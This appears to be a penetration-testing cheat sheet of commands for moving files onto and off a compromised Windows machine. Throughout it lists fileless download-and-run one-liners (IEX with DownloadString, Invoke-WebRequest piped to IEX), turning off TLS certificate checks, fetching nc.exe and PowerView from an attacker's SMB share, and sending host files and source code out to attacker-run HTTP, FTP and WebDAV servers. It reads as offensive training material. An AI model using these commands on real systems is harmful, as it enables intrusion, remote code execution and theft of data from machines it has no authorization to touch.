Windows File Transfer

This sections contains different methods to transfer a file to or from a windows machine.

Transfer File to Target Machine

PowerShell Base64 Encode & Decode

# Pwnbox Check SSH Key MD5 Hash
md5sum id_rsa

# Pwnbox Encode SSH Key to Base64
cat id_rsa |base64 -w 0;echo

# Copy the content and paste in windows powersehll terminal and use some powershel functions to decode it 
PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1C----0tLQo="))

# We can confirm if the file was transferred successfully using the Get-FileHash cmdlet, which does the same thing that md5sum does.
PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

PowerShell Web Downloads

------------------- PowerShell DownloadFile Method ---------------------

PS C:\> # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFile('<https://URL','C:\PATH')

PS C:\> # Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFileAsync('<https://URL', 'filename.ps1')

---------------- PowerShell DownloadString - Fileless Method ----------------

PS C:\> IEX (New-Object Net.WebClient).DownloadString('<https://URL')

--------------------- PowerShell Invoke-WebRequest -----------------------

# You can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.
PS C:\>Invoke-WebRequest <https://URL/PowerView.ps1> -OutFile PowerView.ps1

# if ps shows error Internet Explorer first-launch configuration has not been completed, it can be bypassed using the parameter -UseBasicParsing.
PS C:\> Invoke-WebRequest https://<ip>/ -UseBasicParsing | IEX

# another error ps shows is related to the SSL/TLS secure channel if the certificate is not trusted
PS C:\> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

SMB Downloads

---- without user/pass
# Create the SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshare
smbserver.py a -smb2support .
 
# Copy a File from the SMB Server
C:\> copy \\<ip>\share\nc.exe

---- with user/pass
# Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
smbserver.py a -smb2support . -username tt -password tt

# Mount the SMB Server with Username and Password
C:\\> net use n: \\<ip>\share /user:test test

# other userful comands 
net use \\<ip>\share /u:df df # to connect
copy file \\<ip>\share\ # to copy a file
del file 
net use /d \\<ip>\share # to delete the share  

# note : You can also mount the SMB server if you receive an error when you use `copy filename \\\\IP\\sharename`.

FTP Downloads

# Installing the FTP Server Python3 Module - pyftpdlib
sudo pip3 install pyftpdlib

# Setting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21

# Transfering Files from an FTP Server Using PowerShell
PS C:\> (New-Object Net.WebClient).DownloadFile('<ftp://<ip>/file.txt>', 'ftp-file.txt')

# If we do not have interactive shell, we can create an FTP command file to download a file.
# Create a Command File for the FTP Client and Download the Target File
---
C:\> echo open <ip> > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo GET file.txt >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open <ip>
Log in with USER and PASS first.
ftp> USER anonymous

ftp> GET file.txt
ftp> bye
---

Get File from target host to our attack machine

PowerShell Base64 Encode & Decode

# Encode File Using PowerShell
PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

# Decode Base64 String in Linux
echo IyBDb3B5cmlnaH-----3N0DQo= | base64 -d > hosts
md5sum hosts

PowerShell Web Uploads

# Installing a Configured WebServer with Upload
pip3 install uploadserver
# start a upload server 
python3 -m uploadserver

----------- PowerShell Script to Upload a File to Python Upload Server -------
# PSUpload.ps1 : <https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1>
PS C:\> Invoke-FileUpload -Uri <http://<ip>:8000/upload> -File C:\Windows\System32\drivers\etc\hosts

---------------------- PowerShell Base64 Web Upload -----------------------

PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\> Invoke-WebRequest -Uri <http://192.168.49.128:8000/> -Method POST -Body $b64

# start a listener to get base64 encoded data from target machine and decode it 
nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts

SMB Uploads

# Installing WebDav Python modules
sudo pip install wsgidav cheroot

# Using the WebDav Python module
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

# Connecting to the Webdav Share
C:\> dir \\<ip>\DavWWWRoot

# Uploading Files using SMB
C:\> copy C:\Users\user\Desktop\SourceCode.zip \\<ip>\DavWWWRoot\

FTP Uploads

# we need to specify the option --write to allow clients to upload files to our attack host.
sudo python3 -m pyftpdlib --port 21 --write

# use the PowerShell upload function to upload a file to our FTP Server.
PS C:\> (New-Object Net.WebClient).UploadFile('<ftp://<ip>/ftp-hosts>', 'C:\Windows\System32\drivers\etc\hosts')

# Create a Command File for the FTP Client to Upload a File
--- 
C:\> echo open ip > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo PUT c:\\windows\\system32\\drivers\\etc\\hosts >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open ip

Log in with USER and PASS first.

ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
---